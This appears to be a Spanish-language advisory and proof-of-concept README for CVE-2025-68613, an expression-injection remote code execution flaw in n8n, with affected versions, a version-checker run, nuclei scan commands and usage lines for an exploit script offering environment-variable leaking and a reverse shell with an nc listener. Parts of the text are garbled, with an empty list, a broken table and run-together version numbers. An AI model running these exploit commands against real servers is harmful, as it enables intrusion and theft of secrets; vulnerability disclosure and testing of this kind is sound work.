
CVE-2025-68613

Severidad: 🔴 Crítico Impacto: Ejecución remota de código Plataforma afectada: n8n (automatización de flujos de trabajo)
CVE-2025-68613 es una vulnerabilidad de seguridad crítica en n8n, una plataforma de automatización de flujos de trabajo de código abierto. El problema permite a un atacante autenticado ejecutar código arbitrario en el servidor abusando de la forma en que se evalúan las expresiones de los flujos de trabajo.
💥 Por qué es peligrosa: Las expresiones maliciosas se evalúan en un contexto que no está correctamente aislado, lo que permite acceder al runtime subyacente.

Si se explota, un atacante podría:
El ataque se ejecuta con los mismos privilegios que el servicio de n8n, lo que amplifica su impacto.
| Métrica | Valor |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| Confidencialidad | Alta |
| Integridad | Alta |
| Disponibilidad |
➡️ Se requiere autenticación, pero no se necesita acceso de administrador.
🚫 Vulnerables:
0.211.0 → 1.120.31.121.0✅ Corregidas:
1.120.41.121.11.122.0 y posteriores(NO elimina por completo la vulnerabilidad)
CVE-2025-68613.py — Comprobador remoto de versión y exposición (seguro)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
O si desea escanear una lista de hosts, ejecute:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
Salida de ejemplo
Ejemplos de uso:
Filtrar variables de entorno:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
Obtener información del usuario:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
Reverse shell (inicie el listener primero: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
Este script es únicamente para pruebas de seguridad autorizadas en sistemas que usted posee o para los que tiene permiso explícito de prueba.
🔒 Este script es un exploit Prueba de Concepto (PoC) para CVE-2025-68613 en n8n.
📚 Se proporciona estrictamente con fines educativos y solo para pruebas de seguridad autorizadas.
🛡️ Úselo exclusivamente en sistemas que usted posea, controle o sobre los que tenga permiso explícito por escrito para probar.
🚫 El uso no autorizado contra cualquier sistema es ilegal y puede violar leyes (por ejemplo, leyes contra el fraude y abuso informático).
❌ El autor y las partes asociadas no asumen ninguna responsabilidad por el mal uso, daños o consecuencias legales.
✅ Úselo de manera responsable, ética y en pleno cumplimiento de todas las leyes y regulaciones aplicables.
🔐 Si realiza pruebas de penetración, asegúrese de contar con la autorización adecuada (por ejemplo, Reglas de Compromiso).
🛠️ Los investigadores de seguridad pueden usarlo para verificar vulnerabilidades y fomentar la aplicación oportuna de parches.
| Alta |
| Categoría | Información |
|---|
| ID CVE | CVE-2025-68613 |
| Producto | n8n |
| Clase de fallo | Inyección de expresiones |
| Resultado | Ejecución remota de código |
| Acceso necesario | Usuario autenticado |
| Corrección disponible | Sí |